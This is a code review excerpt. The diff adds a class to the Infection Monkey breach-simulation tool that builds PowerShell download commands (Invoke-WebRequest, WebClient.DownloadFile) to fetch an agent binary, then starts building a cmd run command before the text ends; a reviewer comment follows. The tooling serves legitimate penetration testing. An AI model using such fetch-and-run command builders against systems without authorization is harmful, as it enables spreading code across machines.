monkey/infection_monkey/command_builders/windows_agent_command_builder.py

```diff
@@ -0,0 +1,100 @@
+from pathlib import PureWindowsPath
+from typing import Sequence
+
+from agentpluginapi import (
+    DropperExecutionMode,
+    IAgentOTPProvider,
+    IWindowsAgentCommandBuilder,
+    WindowsDownloadMethod,
+    WindowsDownloadOptions,
+    WindowsRunOptions,
+    WindowsShell,
+)
+from monkeytypes import AgentID
+
+from infection_monkey.utils.commands import build_monkey_commandline_parameters
+
+from .utils import get_agent_argument, get_agent_location
+
+
+class WindowsAgentCommandBuilder(IWindowsAgentCommandBuilder):
+    def __init__(
+        self,
+        agent_id: AgentID,
+        servers: Sequence[str],
+        otp_provider: IAgentOTPProvider,
+        agent_otp_environment_variable: str,
+        current_depth: int = 0,
+    ):
+        self._agent_id = agent_id
+        self._servers = servers
+        self._otp_provider = otp_provider
+        self._agent_otp_environment_variable = agent_otp_environment_variable
+        self._current_depth = current_depth
+        self._command = ""
+
+    def build_download_command(self, download_options: WindowsDownloadOptions):
+        if download_options.download_method == WindowsDownloadMethod.WEB_REQUEST:
+            download_command_func = self._build_download_command_webrequest
+        if download_options.download_method == WindowsDownloadMethod.WEB_CLIENT:
+            download_command_func = self._build_download_command_webclient
+
+        # We always download using powershell since CMD doesn't have
+        # or it is really hard to set a download command
+        self._command += "powershell "
+
+        self._command += download_command_func(
+            download_options.download_url, download_options.agent_destination_path
+        )
+
+    def _build_download_command_webrequest(
+        self, download_url: str, destination_path: PureWindowsPath
+    ) -> str:
+        return (
+            f"Invoke-WebRequest -Uri '{download_url}' "
+            f"-OutFile '{destination_path}' -UseBasicParsing ; "
+        )
+
+    def _build_download_command_webclient(
+        self, download_url: str, destination_path: PureWindowsPath
+    ) -> str:
+        return (
+            "(new-object System.Net.WebClient)"
+            f".DownloadFile(^''{download_url}^'' , ^''{destination_path}^'') ; "
+        )
+
+    def build_run_command(self, run_options: WindowsRunOptions):
+        if self._command != "":
+            if run_options.shell == WindowsShell.CMD:
+                self._command += "cmd.exe /c "
```

Comment:
It's worth adding a comment here explaining that downloads are always powershell so this is How we have to switch back to cmd.